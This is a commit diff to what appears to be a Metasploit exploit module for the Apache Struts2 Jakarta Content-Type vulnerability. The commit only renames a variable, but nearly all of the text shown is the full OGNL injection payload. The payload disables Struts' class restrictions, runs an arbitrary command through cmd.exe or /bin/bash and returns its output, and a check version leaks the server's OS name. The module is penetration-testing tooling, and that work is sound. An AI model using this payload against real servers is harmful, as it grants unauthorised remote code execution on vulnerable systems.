Don't step on the payload accessor

egypt · egypt · commit e07d5332de45 · 2017-03-09T13:54:00.000-06:00
diff --git a/modules/exploits/multi/http/struts2_code_exec_jakarta.rb b/modules/exploits/multi/http/struts2_code_exec_jakarta.rb
@@ -46,14 +46,14 @@ def print_status(msg='')
     super("#{peer} - #{msg}")
   end
 
-  def send_http_request(payload)
+  def send_http_request(content_type)
     uri = normalize_uri(datastore["TARGETURI"])
     resp = send_request_cgi(
       'uri'     => uri,
       'version' => '1.1',
       'method'  => 'GET',
       'headers' => {
-        'Content-Type': payload
+        'Content-Type': content_type
       }
     )
 
@@ -64,47 +64,47 @@ def send_http_request(payload)
   end
 
   def http_send_command(cmd)
-    payload = "%{(#_='multipart/form-data')."
-    payload << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
-    payload << "(#_memberAccess?"
-    payload << "(#_memberAccess=#dm):"
-    payload << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
-    payload << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
-    payload << "(#ognlUtil.getExcludedPackageNames().clear())."
-    payload << "(#ognlUtil.getExcludedClasses().clear())."
-    payload << "(#context.setMemberAccess(#dm))))."
-    payload << "(#cmd='#{cmd}')."
-    payload << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
-    payload << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
-    payload << "(#p=new java.lang.ProcessBuilder(#cmds))."
-    payload << "(#p.redirectErrorStream(true))."
-    payload << "(#process=#p.start())."
-    payload << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
-    payload << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
-    payload << "(#ros.flush())}"
-    send_http_request(payload)
+    content_type = "%{(#_='multipart/form-data')."
+    content_type << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    content_type << "(#_memberAccess?"
+    content_type << "(#_memberAccess=#dm):"
+    content_type << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    content_type << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    content_type << "(#ognlUtil.getExcludedPackageNames().clear())."
+    content_type << "(#ognlUtil.getExcludedClasses().clear())."
+    content_type << "(#context.setMemberAccess(#dm))))."
+    content_type << "(#cmd='#{cmd}')."
+    content_type << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+    content_type << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    content_type << "(#p=new java.lang.ProcessBuilder(#cmds))."
+    content_type << "(#p.redirectErrorStream(true))."
+    content_type << "(#process=#p.start())."
+    content_type << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    content_type << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+    content_type << "(#ros.flush())}"
+    send_http_request(content_type)
   end
 
   def check
     var_a = rand_text_alpha_lower(4)
 
-    payload = ""
-    payload << %q|%{|
-    payload << %q|(#_='multipart/form-data').|
-    payload << %q|(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).|
-    payload << %q|(#_memberAccess?|
-    payload << %q|(#_memberAccess=#dm):|
-    payload << %q|((#container=#context['com.opensymphony.xwork2.ActionContext.container']).|
-    payload << %q|(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).|
-    payload << %q|(#ognlUtil.getExcludedPackageNames().clear()).|
-    payload << %q|(#ognlUtil.getExcludedClasses().clear()).|
-    payload << %q|(#context.setMemberAccess(#dm)))).|
-    payload << %q|(#os=@java.lang.System@getProperty('os.name')).|
-    payload << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
-    payload << %q|}|
+    content_type = ""
+    content_type << %q|%{|
+    content_type << %q|(#_='multipart/form-data').|
+    content_type << %q|(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).|
+    content_type << %q|(#_memberAccess?|
+    content_type << %q|(#_memberAccess=#dm):|
+    content_type << %q|((#container=#context['com.opensymphony.xwork2.ActionContext.container']).|
+    content_type << %q|(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).|
+    content_type << %q|(#ognlUtil.getExcludedPackageNames().clear()).|
+    content_type << %q|(#ognlUtil.getExcludedClasses().clear()).|
+    content_type << %q|(#context.setMemberAccess(#dm)))).|
+    content_type << %q|(#os=@java.lang.System@getProperty('os.name')).|
+    content_type << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
+    content_type << %q|}|
 
     begin
-      resp = send_http_request(payload)
+      resp = send_http_request(content_type)
     rescue Msf::Exploit::Failed
       return Exploit::CheckCode::Unknown
     end
